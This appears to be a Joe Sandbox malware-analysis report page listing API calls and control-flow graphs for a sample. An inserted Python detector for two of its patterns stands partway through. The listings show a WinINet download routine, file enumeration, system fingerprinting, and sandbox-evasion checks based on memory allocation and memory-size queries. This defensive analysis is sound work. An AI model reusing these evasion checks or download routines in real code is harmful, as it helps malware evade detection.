                                • lstrcpy.KERNEL32(00000000,?), ref: 009CF64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CF69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 009CF718
                                • lstrlen.KERNEL32(010C8C58), ref: 009CF746
                                • lstrcpy.KERNEL32(00000000,010C8C58), ref: 009CF771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CF793
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CF7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 009CFA32
                                • lstrlen.KERNEL32(010C8C78), ref: 009CFA60
                                • lstrcpy.KERNEL32(00000000,010C8C78), ref: 009CFA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CFAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CFAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: c06219b84561e068367b708a6ac08be9e9de5e6d7238ce538b577690f3fc77dd
                                • Instruction ID: 7c01c7b33b6c4bc0600a2b5482500d2bf4ca0cccf3b0c61f8a30203055ee8da6
                                • Opcode Fuzzy Hash: c06219b84561e068367b708a6ac08be9e9de5e6d7238ce538b577690f3fc77dd
                                • Instruction Fuzzy Hash: 17F14D30E01642DFDB24CF69C9A8B55B7EABF44314B1980BED4099B3A1EB35DC46CB52

                                 Control-flow Graph (function at 9c8ca0; rendered graph not reproduced, basic blocks listed in address order with the APIs they call)
                                 • 9c8ca0 StrCmpCA at entry; one branch goes to 9c8cc6 ExitProcess, the other to a multi-way dispatch at 9c8cff with thirteen further StrCmpCA / lstrlen comparisons (9c8d06 to 9c8e88), each followed by call 9b2a20 or 9b2930
                                 • 9c8eb3 result check; 9c8ebb lstrcpy; 9c8ec3 loops back to 9c8cf6; 9c8ee2 call 9b2a20 on exit
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 728fe1697d6b1a892ff57fc36b1364ea1a6fdab979712c61226b1c1d2007995b
                                • Instruction ID: 92e78b1889f395d017b2c0a1e8556ccea0305c674e869244422ad38cb34e2e3a
                                • Opcode Fuzzy Hash: 728fe1697d6b1a892ff57fc36b1364ea1a6fdab979712c61226b1c1d2007995b
                                • Instruction Fuzzy Hash: 77516830E04641ABCB21AF65DA89F6B7BE8BB84704B104C6DE482D7651DB78E8458B22

                                 Control-flow Graph (function at 9d2740; rendered graph not reproduced, basic blocks listed in address order with the APIs they call)
                                 • 9d2740 GetWindowsDirectoryA; 9d278c GetVolumeInformationA; 9d27f4 loop; 9d2809 GetProcessHeap, RtlAllocateHeap; 9d2826 wsprintfA (bypassed via 9d2822 on one branch); 9d285b call 9d71e0
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 009D277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,009C93B6,00000000,00000000,00000000,00000000), ref: 009D27AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009D280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D2816
                                • wsprintfA.USER32 ref: 009D283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: ca7af9848235468fa0efc8c8bb03ac8c901661f4593628896bbb9afe8c907bd3
                                • Instruction ID: fab312ba9725d79286026171c82a293ba48875ff4d0dfa08c5514f52cc505de1
                                • Opcode Fuzzy Hash: ca7af9848235468fa0efc8c8bb03ac8c901661f4593628896bbb9afe8c907bd3
                                • Instruction Fuzzy Hash: 2B3150B1D482499BCB14CFB88A85AEFFFBCEF58710F10416AE505F7650E6749A408BA1

                                 Control-flow Graph (function at 9b4bc0; rendered graph not reproduced)
                                 • 9b4bc0 entry; 9b4bd0 short loop; 9b4bd7 ??2@YAPAXI@Z x3 (three 0x800-byte buffers), lstrlen, InternetCrackUrlA, call 9b2a20
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 009B4BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 009B4C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 009B4C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 009B4C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 009B4C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: 991cbf26df40cd068ec95307edb54b242889632e49d6566d0e8e6dadad641802
                                • Instruction ID: 25102cb3d771fdad6cb3b551db331700a8407a5aed353dd82bff4926af7e3950
                                • Opcode Fuzzy Hash: 991cbf26df40cd068ec95307edb54b242889632e49d6566d0e8e6dadad641802
                                • Instruction Fuzzy Hash: 42012D71D00218ABDB10DFA8EC45B9EBBB8EB48320F004566F918E7390DF7459048FD4

                                 Control-flow Graph (function at 9b1030; rendered graph not reproduced)
                                 • 9b1030 GetCurrentProcess, VirtualAllocExNuma; one branch to 9b1057 ExitProcess, the other to 9b105e VirtualAlloc; 9b1082 check; 9b108a VirtualFree on one branch; 9b10b1 return
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009B1046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 009B104D
                                • ExitProcess.KERNEL32 ref: 009B1058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009B106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 009B10AB
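Added example (not Joe Sandbox code and not code from the sample): a small Python parser for the "APIs" bullets of two function records on this page, the WinINet routine at 9b6c40 and the routine at 9b1030. It rebuilds the ordered call sequence from the ref addresses and flags two things a triage analyst looks for in these listings. First, the InternetOpenA / InternetConnectA / HttpOpenRequestA / HttpSendRequestA / InternetReadFile chain, together with the HTTP verb, the InternetSetOptionA call with option 0x1F (INTERNET_OPTION_SECURITY_FLAGS, which governs certificate-validation behaviour on the request), the HttpQueryInfoA query 0x13 (HTTP_QUERY_STATUS_CODE) and the 0x7CF-byte read size. Second, the VirtualAllocExNuma call with an ExitProcess on one edge, followed by a VirtualAlloc of 0x17C841C0 bytes (399,000,000, a conspicuously round figure) that is freed again. Reading that second pattern as a sandbox memory-size probe is an analyst inference, not something the report states; the 256 MiB threshold, the bullet grammar assumed by the regular expression and the two's-complement reading of negative argument displays are the example's own choices. The sample lines are copied, abridged, from the bullets above.

```python
"""Flag two behaviours in the 'APIs' bullets of a Joe Sandbox function record.
Added example for this report page; not Joe Sandbox code and not code from the sample.
Assumed: the bullet grammar shown on this page and a 256 MiB "large allocation" threshold."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# "func.MODULE(args), ref: ADDR"; calls without recovered args appear as "func.MODULE ref: ADDR"
API_LINE = re.compile(
    r"^\s*•?\s*(?P<func>[^.\s(]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
INTERNET_OPTION_SECURITY_FLAGS = 0x1F  # documented WinINet option id 31
HTTP_QUERY_STATUS_CODE = 0x13          # documented WinINet query id 19
WININET_CHAIN = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                 "HttpSendRequestA", "InternetReadFile"]

# Bullets copied (abridged) from this report: the routine at 9b6c40 ...
WININET_SAMPLE = """
• InternetOpenA.WININET(009DCFEC,00000001,00000000,00000000,00000000), ref: 009B6CD5
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009B6D15
• HttpOpenRequestA.WININET(00000000,GET,?,010CEEB8,00000000,00000000,-00400100,00000000), ref: 009B6D50
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 009B6D77
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009B6D86
• HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 009B6DA5
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009B6DFF
• InternetCloseHandle.WININET(00000000), ref: 009B6EA2
"""
# ... and the routine at 9b1030.
EVASION_SAMPLE = """
• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009B1046
• VirtualAllocExNuma.KERNEL32(00000000), ref: 009B104D
• ExitProcess.KERNEL32 ref: 009B1058
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009B106C
• VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 009B10AB
"""


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]
    ref: int  # address of the call site


def hex_arg(value: str) -> Optional[int]:
    """DWORD args are hex; '?' is unrecovered; a leading '-' is assumed to be a signed rendering."""
    if not re.fullmatch(r"-?[0-9A-Fa-f]+", value):
        return None  # '?', or a string literal such as GET / ERROR
    n = int(value.lstrip("-"), 16)
    return (-n) & 0xFFFFFFFF if value.startswith("-") else n


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return the bullets as ApiCall records sorted by call-site address."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            raw = (m.group("args") or "").strip()
            args = [a.strip() for a in raw.split(",")] if raw else []
            calls.append(ApiCall(m.group("func"), m.group("module"), args, int(m.group("ref"), 16)))
    return sorted(calls, key=lambda c: c.ref)


def find_wininet_download(calls: List[ApiCall]) -> Optional[Dict]:
    """Detect the ordered open/connect/request/send/read chain and describe it, or return None."""
    names, pos = [c.func for c in calls], 0
    for step in WININET_CHAIN:
        if step not in names[pos:]:
            return None
        pos = names.index(step, pos) + 1
    info: Dict = {"verb": None, "sets_security_flags": False, "checks_status_code": False, "read_chunk": None}
    for c in calls:
        a = c.args
        if c.func == "HttpOpenRequestA" and len(a) > 1:
            info["verb"] = a[1]
        elif c.func == "InternetSetOptionA" and len(a) > 1 and hex_arg(a[1]) == INTERNET_OPTION_SECURITY_FLAGS:
            info["sets_security_flags"] = True  # request-level TLS/certificate policy is being changed
        elif c.func == "HttpQueryInfoA" and len(a) > 1 and hex_arg(a[1]) == HTTP_QUERY_STATUS_CODE:
            info["checks_status_code"] = True
        elif c.func == "InternetReadFile" and len(a) > 2 and info["read_chunk"] is None:
            info["read_chunk"] = hex_arg(a[2])  # bytes requested per read
    return info


def find_memory_probe(calls: List[ApiCall], min_bytes: int = 256 * 1024 * 1024) -> Optional[Dict]:
    """Detect a VirtualAllocExNuma gate that can exit, plus a large VirtualAlloc/VirtualFree pair."""
    names = [c.func for c in calls]
    result: Dict = {"numa_gate_exits": False, "large_alloc_bytes": None, "freed": False}
    if "VirtualAllocExNuma" in names:
        result["numa_gate_exits"] = "ExitProcess" in names[names.index("VirtualAllocExNuma") + 1:]
    for c in calls:
        if c.func == "VirtualAlloc" and len(c.args) > 1:
            size = hex_arg(c.args[1])
            if size is not None and size >= min_bytes:
                result["large_alloc_bytes"] = size
        elif c.func == "VirtualFree" and len(c.args) > 1 and result["large_alloc_bytes"] is not None:
            result["freed"] = hex_arg(c.args[1]) == result["large_alloc_bytes"]
    return result if result["numa_gate_exits"] or result["large_alloc_bytes"] is not None else None
```

Pass the "APIs" section of any other record on this page to parse_api_lines to get the same address-ordered view; the two detectors return None when the pattern is absent, so they can be run over every record in the report without special-casing.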
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: b5d0ad0769be4dfd098e7c3ac3f24a947bfd5399a666ba16a3825ea7bbfb516e
                                • Instruction ID: 28a6016224952dc7dd6b6e30859fa8acb687d05d07c2c7221737d0b16ab4535d
                                • Opcode Fuzzy Hash: b5d0ad0769be4dfd098e7c3ac3f24a947bfd5399a666ba16a3825ea7bbfb516e
                                • Instruction Fuzzy Hash: 2301F4717402447BE7205A656CAAFAB77ADA784B11F608414F708EB2C0DEB1EA048664

                                 Control-flow Graph
                                 control_flow_graph 2805 9cee90-9ceeb5 call 9b2930 2808 9ceec9-9ceecd call 9b6c40 2805->2808 2809 9ceeb7-9ceebf 2805->2809 2812 9ceed2-9ceee8 StrCmpCA 2808->2812 2809->2808 2810 9ceec1-9ceec3 lstrcpy 2809->2810 2810->2808 2813 9ceeea-9cef02 call 9b2a20 call 9b2930 2812->2813 2814 9cef11-9cef18 call 9b2a20 2812->2814 2823 9cef04-9cef0c 2813->2823 2824 9cef45-9cefa0 call 9b2a20 * 10 2813->2824 2820 9cef20-9cef28 2814->2820 2820->2820 2822 9cef2a-9cef37 call 9b2930 2820->2822 2822->2824 2831 9cef39 2822->2831 2823->2824 2827 9cef0e-9cef0f 2823->2827 2830 9cef3e-9cef3f lstrcpy 2827->2830 2830->2824 2831->2830
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CEEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 009CEEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 009CEF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: acd129621106f6338a174f44fab3f923068f088758ca763088f4cfe9c389175b
                                • Instruction ID: 5ad79d1c24d9d615b5f64690add16f9c77e0a426e05c8e9ec11429c3f002393a
                                • Opcode Fuzzy Hash: acd129621106f6338a174f44fab3f923068f088758ca763088f4cfe9c389175b
                                • Instruction Fuzzy Hash: F021F171A202469BCB21FFB9DE46BDE77A4EF54310F04546CB84AEB252DA34EC148791

                                 Control-flow Graph
                                 control_flow_graph 2886 9b10c0-9b10cb 2887 9b10d0-9b10dc 2886->2887 2889 9b10de-9b10f3 GlobalMemoryStatusEx 2887->2889 2890 9b1112-9b1114 ExitProcess 2889->2890 2891 9b10f5-9b1106 2889->2891 2892 9b111a-9b111d 2891->2892 2893 9b1108 2891->2893 2893->2890 2894 9b110a-9b1110 2893->2894 2894->2890 2894->2892
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 91786ae3750eda42167b49682ff3620b6344a79864f473857b4d80068d2047bb
                                • Instruction ID: 2e171e7efdea00f9ec6c61de798ebaaedb688623ebf9fd2f48b816e635954ad0
                                • Opcode Fuzzy Hash: 91786ae3750eda42167b49682ff3620b6344a79864f473857b4d80068d2047bb
                                • Instruction Fuzzy Hash: EAF0277010C2895BEB18BA68DA6A3BDF7DCEB00370FA00929DE9AC3181E630C8508527

                                 Control-flow Graph
                                 control_flow_graph 2895 9c8c8a-9c8cc4 StrCmpCA 2897 9c8ccd-9c8ce6 2895->2897 2898 9c8cc6-9c8cc7 ExitProcess 2895->2898 2900 9c8cec-9c8cf1 2897->2900 2901 9c8ee2-9c8eef call 9b2a20 2897->2901 2903 9c8cf6-9c8cf9 2900->2903 2905 9c8cff 2903->2905 2906 9c8ec3-9c8edc 2903->2906 2907 9c8dbd-9c8dcb StrCmpCA 2905->2907 2908 9c8ddd-9c8deb StrCmpCA 2905->2908 2909 9c8dfd-9c8e0b StrCmpCA 2905->2909 2910 9c8e1d-9c8e2b StrCmpCA 2905->2910 2911 9c8e3d-9c8e4b StrCmpCA 2905->2911 2912 9c8d5a-9c8d69 lstrlen 2905->2912 2913 9c8e56-9c8e64 StrCmpCA 2905->2913 2914 9c8d30-9c8d3f lstrlen 2905->2914 2915 9c8e6f-9c8e7d StrCmpCA 2905->2915 2916 9c8e88-9c8e9a lstrlen 2905->2916 2917 9c8d84-9c8d92 StrCmpCA 2905->2917 2918 9c8da4-9c8db8 StrCmpCA 2905->2918 2919 9c8d06-9c8d15 lstrlen 2905->2919 2906->2901 2945 9c8cf3 2906->2945 2907->2906 2933 9c8dd1-9c8dd8 2907->2933 2908->2906 2934 9c8df1-9c8df8 2908->2934 2909->2906 2935 9c8e11-9c8e18 2909->2935 2910->2906 2936 9c8e31-9c8e38 2910->2936 2911->2906 2920 9c8e4d-9c8e54 2911->2920 2929 9c8d6b-9c8d70 call 9b2a20 2912->2929 2930 9c8d73-9c8d7f call 9b2930 2912->2930 2913->2906 2923 9c8e66-9c8e6d 2913->2923 2927 9c8d49-9c8d55 call 9b2930 2914->2927 2928 9c8d41-9c8d46 call 9b2a20 2914->2928 2915->2906 2924 9c8e7f-9c8e86 2915->2924 2925 9c8e9c-9c8ea1 call 9b2a20 2916->2925 2926 9c8ea4-9c8eb0 call 9b2930 2916->2926 2917->2906 2932 9c8d98-9c8d9f 2917->2932 2918->2906 2921 9c8d1f-9c8d2b call 9b2930 2919->2921 2922 9c8d17-9c8d1c call 9b2a20 2919->2922 2920->2906 2954 9c8eb3-9c8eb5 2921->2954 2922->2921 2923->2906 2924->2906 2925->2926 2926->2954 2927->2954 2928->2927 2929->2930 2930->2954 2932->2906 2933->2906 2934->2906 2935->2906 2936->2906 2945->2903 2954->2906 2955 9c8eb7-9c8eb9 2954->2955 2955->2906 2956 9c8ebb-9c8ebd lstrcpy 2955->2956 2956->2906
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: f3a5b27d657fa94dcfaadce26fb6cde786379b94c72d8fb327b90d5888808ec2
                                • Instruction ID: d38d47accbc1c7ad12d612bb50898fbfc65f400380fe58b410d9f7bd635518d0
                                • Opcode Fuzzy Hash: f3a5b27d657fa94dcfaadce26fb6cde786379b94c72d8fb327b90d5888808ec2
                                • Instruction Fuzzy Hash: 73E026645083C6FBCB019BB6DCC8D577F6C9F44700F84846CF5444B602DE288C08C369
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C2402
                                • lstrlen.KERNEL32(\*.*), ref: 009C240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 009C2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 0d8f7dc26c767fd39e27900757083725ffeb415540c14e2fe85086b6d3795a3e
                                • Instruction ID: 4b55d974fb575d044f8d5849f50171496f6ba35711398f5ca42c8092606d54bf
                                • Opcode Fuzzy Hash: 0d8f7dc26c767fd39e27900757083725ffeb415540c14e2fe85086b6d3795a3e
                                • Instruction Fuzzy Hash: E8A27C31D116569BDB21EFB4DE88FAE77B9EF84710F044028B80AAB251DF34DD458B92
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B16E2
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B176C
                                • lstrcat.KERNEL32(00000000), ref: 009B1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B17A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B17EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B17F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1875
                                • lstrcat.KERNEL32(00000000), ref: 009B187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B18AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B18FE
                                • lstrlen.KERNEL32(009E1794), ref: 009B1909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1929
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1966
                                • lstrlen.KERNEL32(\*.*), ref: 009B1971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 009B199A
                                  • Part of subcall function 009D4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009D406D
                                  • Part of subcall function 009D4040: lstrcpy.KERNEL32(00000000,?), ref: 009D40A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B19C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1A16
                                • lstrlen.KERNEL32(009E1794), ref: 009B1A21
